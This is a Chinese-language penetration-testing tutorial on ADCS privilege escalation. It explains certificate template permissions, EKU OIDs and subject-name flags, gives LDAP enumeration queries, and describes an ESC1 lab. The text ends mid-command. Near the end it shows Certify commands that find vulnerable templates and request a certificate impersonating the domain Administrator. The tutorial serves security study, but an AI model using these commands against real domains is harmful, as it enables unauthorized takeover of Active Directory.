# ADCS权限提升 ## 证书模板 ### 注册权限对于证书模板，模板的 DACL 中的以下 ACE 可能会导致主体具有注册权限： * ACE 为主体授予证书注册`（Certificate-Enrollment）`扩展权限。这个 ACE 授予主体`RIGHT_DS_CONTROL_ACCESS` 访问权限，其中 `ObjectType` 设置为`0e10c968-78fb-11d2-90d4-00c04f79dc5547` 。此 `GUID` 对应于 `Certificate-Enrollment` 权限 * ACE 为主体授予证书自动注册 `（Certificate-AutoEnrollment）`扩展权限。这个 ACE 授予主体`RIGHT_DS_CONTROL_ACCESS` 访问权限，其中 `ObjectType` 设置为 `a05b8cc2-17bc-4802-a710-e7c15ab866a249` 。此 `GUID` 对应于 `Certificate-AutoEnrollment` 扩展权限 * ACE 为主体授予所有扩展`（ExtendedRights）`权限。这个 ACE 启⽤ `RIGHT_DS_CONTROL_ACCESS` 访问权限，其中 `ObjectType` 设置为 `00000000- 0000-0000-0000-000000000000` 。此 `GUID` 对应于`ExtendedRights` 权限 * ACE 为主体授予完全控制`（FullControl/GenericAll）`权限。这个 ACE 启用 `FullControl/GenericAll` 访问权限使用域控默认powershell模块查询 ``` Import-Module ActiveDirectory cd AD: $Acl = Get-Acl 'CN=<证书模板名称>,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=' $Acl.Access.Count $Acl.Access | where IdentityReference -match '' # 也可以是查询组对证书模板的ACE # ActiveDirectory是域控默认安装的模板 ``` 查询域用户test1对ESC1证书模板的ACE

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681962923873.png) 也可以使用powerview查询 ``` Get-DomainUser -Identity -Properties objectsid # 查询user的SID Get-DomainObjectAcl -Identity ESC4 -SearchBase "LDAP://CN=Configuration,DC=fbi,DC=gov" | ?{$_.SecurityIdentifier -match ""} # 查询user对ESC4证书模板的ACE ```

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1682076607800.png) ### 扩展 #### 应用程序策略应用程序策略提供证书的特定用途的重要功能，有时也称为扩展的密钥用法或增强型密钥用法这是一些常用的应用程序策略 | 作用 | 对象标识符 | | ---------------- | ------------------------ | | 客户端身份验证 | 1.3.6.1.5.5.7.3.2 | | CA 加密证书 | 1.3.6.1.4.1.311.21.5 | | 智能卡登录 | 1.3.6.1.4.1.311.20.2.2 | | 文档签名 | 1.3.6.1.4.1.311.10.3.12 | | 文件恢复 | 1.3.6.1.4.1.311.10.3.4.1 | | 密钥恢复 | 1.3.6.1.4.1.311.10.3.11 | | Microsoft 信任列表签名 | 1.3.6.1.4.1.311.10.3.1 | | 合格的部属 | 1.3.6.1.4.1.311.10.3.10 | | 根列表签名程序 | 1.3.6.1.4.1.311.10.3.9 | 可以根据对象标识符(OID)查询对应作用的证书，其Ldap-Display-Name为pKIExtendedKeyUsage 其他OID可以在安装证书机器上使用`certtmpl.msc`打开证书模板控制台，在证书模板->更多操作->查看对象标识符中查看

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681827135946.png)

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681827266484.png) 可以使用adfind或者powerview等工具进行ldap查询，查询使用特定应用程序策略的证书模板查询具有客户端身份验证应用程序策略的证书模板： ``` adfind -b "CN=Configuration,DC=fbi,DC=gov" -f "(&(objectclass=pkicertificatetemplate)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2))" ```

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681826900500.png) 也可以使用powerview ``` Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2))' -SearchBase 'CN=Configuration,DC=fbi,DC=gov' ```

#### 发布要求除了证书模板和企业CA访问控制限制之外，还有用于控制证书注册的两个证书模板设置，就是发布要求当选择"CA证书管理程序批准"，申请就会至于挂起状态，其`msPKI-Enrollment-Flag`属性会被设置为`CT_FLAG_PEND_ALL_REQUESTS (0x2)` 位

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681900477503.png) 用户(计算机)申请注册证书之后需要证书管理员在颁发证书之前予以批准或拒绝

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681901285715.png) 可以使用ldap根据是否选择"CA证书管理程序批准"查询证书模板，其Ldap-Display-Name为msPKI-Enrollment-Flag 查询选择了"CA证书管理程序批准"的证书模板 ``` adfind -b "CN=Configuration,DC=fbi,DC=gov" -f "(&(objectclass=pkicertificatetemplate)(msPKI-Enrollment-Flag=2))" # 未开启msPKI-Enrollment-Flag=0 ``` ``` Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(msPKI-Enrollment-Flag=0))' -SearchBase 'CN=Configuration,DC=fbi,DC=gov' ``` #### 注册代理、授权签名和应用程序策略 "授权签名的数量"和"应用程序策略"是发布要求的第二组限制，前者要求证书请求(CSR)在证书被颁发之前由现有的授权证书进行数字签名；后者定义了颁发证书所需签名证书必须具有的EKU OID 这些设置常见用途为证书申请代理，其授予可以代表其他用户请求证书的实体。CA会向注册代理账户颁发至少包含证书请求代理EKU(OID为1.3.6.1.4.1.311.20.2.1)的证书，一旦颁发，注册代理就可以代表其他用户签署CSR并请求证书可以使用ldap查询发布要求中证书请求的计数器签名中所需的RA应用程序策略OID，其Ldap-Display-Name为msPKI-RA-Application-Policies，授权签名数量的Ldap-Display-Name为msPKI-RA-Signature 查询证书请求的计数器签名中所需的RA应用程序策略为证书申请代理的证书模板 ``` adfind -b "CN=Configuration,DC=fbi,DC=gov" -f "(&(objectclass=pkicertificatetemplate)(msPKI-RA-Application-Policies=1.3.6.1.4.1.311.20.2.1))" ```

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681912283522.png) ``` Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(msPKI-RA-Application-Policies=1.3.6.1.4.1.311.20.2.2))' -SearchBase 'CN=Configuration,DC=fbi,DC=gov' ``` ### 使用者名称

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681968890636.png) 与证书关联的私钥的持有者称为使用者，这可以是用户、程序或几乎任何对象、计算机或服务 Windows 可根据 Active Directory 域服务 (AD DS) 中存储的使用者信息自动生成使用者名称，或可通过使用者手动提供使用者名称（例如，使用证书注册网页创建和提交证书申请）在选择"请求中提供"选项后，"使用现有证书中的使用者信息进行自动注册续订请求"选项可用于简化将使用者名称添加到证书续订请求的任务,可使证书注册客户端基于相同的证书模板从现有计算机证书中读取使用者名称和使用者备用名称信息；用于已过期、吊销或在续订期内的计算机证书在请求中提供的`msPKI-Certificate-Name-Flag`属性为`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` 使用现有证书中的使用者信息进行自动注册续订请求的`msPKI-Certificate-Name-Flag`属性为CT\_FLAG\_OLD\_CERT\_SUPPLIES\_SUBJECT\_AND\_ALT\_NAME 在选择"用Active Diretory中的信息生成之后"可以配置一下选项 **使用者名称格式** | 设置 | 描述 | | -------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------- | | **公用名** `msPKI-Certificate-Name-Flag`属性为CT\_FLAG\_SUBJECT\_REQUIRE\_COMMON\_NAME | CA 根据从 AD DS 获取的公用名 (CN) 创建使用者名称。此名称在域中应该唯一，但在企业中可能不唯一。 | | **完全可分辨名称 (DN)** `msPKI-Certificate-Name-Flag`属性为CT\_FLAG\_SUBJECT\_REQUIRE\_DIRECTORY\_PATH | CA 根据从 AD DS 获取的完全可分辨名称创建使用者名称。这可确保在企业中名称唯一。 | | **在使用者名称中包括电子邮件名**`msPKI-Certificate-Name-Flag`属性为CT\_FLAG\_SUBJECT\_REQUIRE\_EMAIL | 如果 Active Directory 用户对象中填充了电子邮件名字段，则该电子邮件名将作为使用者名称的一部分包括在公用名或完全可分辨名称中。 | | **无** | 此证书不要求名称值。 | | **DNS名称**`msPKI-Certificate-Name-Flag`属性为CT\_FLAG\_SUBJECT\_REQUIRE\_DNS\_AS\_CN | 从活动目录中请求者用户对象的 DNS 属性作为主题中的CN 颁发的证书 | **将这个信息包括在另一个使用者名称中** | 设置 | 描述 | | ------------------------------------------------------------------------------------ | --------------------------------------------------- | | **电子邮件名** `msPKI-Certificate-Name-Flag`属性为CT\_FLAG\_SUBJECT\_ALT\_REQUIRE\_EMAIL | **如果 Active Directory 用户对象中填充了电子邮件名字段**，则将使用该电子邮件名。 | | **DNS 名称** `msPKI-Certificate-Name-Flag`属性为CT\_FLAG\_SUBJECT\_ALT\_REQUIRE\_DNS | 这是申请证书的使用者的完全限定的域名 (FQDN)。这在**计算机证书**中最常用。 | | **用户主体名称(UPN)** `msPKI-Certificate-Name-Flag`属性为CT\_FLAG\_SUBJECT\_ALT\_REQUIRE\_UPN | 用户主体名称是 Active Directory 用户对象的一部分，并将使用该名称。 | | \*\*服务主体名称(SPN)\*\*CT\_FLAG\_SUBJECT\_ALT\_REQUIRE\_SPN | 服务主体名称是 Active Directory 计算机对象的一部分，并将使用该名称。 | ### 可用于域身份验证的EKU | 描述 | OID | | ------------------------------ | ---------------------- | | Client Authentication | 1.3.6.1.5.5.7.3.2 | | PKINIT Client Authentication\* | 1.3.6.1.5.2.3.4 | | Smart Card Logon | 1.3.6.1.4.1.311.20.2.2 | | Any Purpose | 2.5.29.37.0 | | SubCA | (no EKUs) | **默认情况下，AD CS 部署中不存在 OID 1.3.6.1.5.2.3.4，因此需要⼿动添加，但它确实适⽤于客户端⾝份验证** ## 权限提升 ### 环境 ESC1-5 ``` 域:FBI.GOV 机器: DC.FBI.GOV(域控 ADCS服务器) 10.10.10.139 Windows server 2019 ICE.FBI.GOV 10.10.10.234 Windows 10 企业版 SERVER.FBI.GOV 10.10.10.52 Windows server 2019 域用户: FBI\administrator（域管） FBI\ICE（域管） FBI\test1 FBI\test2 FBI\fileserver ``` ESC6-7 ``` 域:ICE.COM 机器: DC.ICE.COM(域控 ADCS服务器) 1.1.1.10 Windows server 2019 SERVER.ICE.COM 1.1.1.12 windows server 2019 域用户: ICE\test1（域管） ICE\test2 ``` ESC8 ``` 域:ICE.COM 机器: DC.ICE.COM(域控 ADCS服务器) 1.1.1.10 Windows server 2019 SERVER2012.ICE.COM(ADCS服务器) 1.1.1.20 Windows server 2012 r2 SERVER.ICE.COM 1.1.1.12 windows server 2019 kali Linux(攻击机器) 1.1.1.6 域用户: ICE\test1（域管） ICE\server2012（域管） ICE\test2 ``` ### ESC1 #### 配置 * 颁发CA授予低权限用户请求权限（默认）

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681728727827.png) * 模板中CA证书管理程序批准未启用（默认）

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681728776935.png) * 模板中无需授权签名（默认）

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681728820250.png) * 模板允许低权限用户注册

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681912786988.png) * **证书模板定义了域身份验证的EKU(经测试五种EKU均成功利用)**

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681728912556.png) * **证书模板允许请求者在CSR中指定subjectAltName**

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681728943484.png) #### 利用 * 查找漏洞模板 ``` Certify.exe find /vulnerable ```

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681729981766.png) * 伪造域管理员Administrator注册证书 ``` Certify.exe request /ca:dc.fbi.gov\fbi-DC-CA /template:ESC1 /altname:FBI\Administrator # Certify.exe request /ca: /template: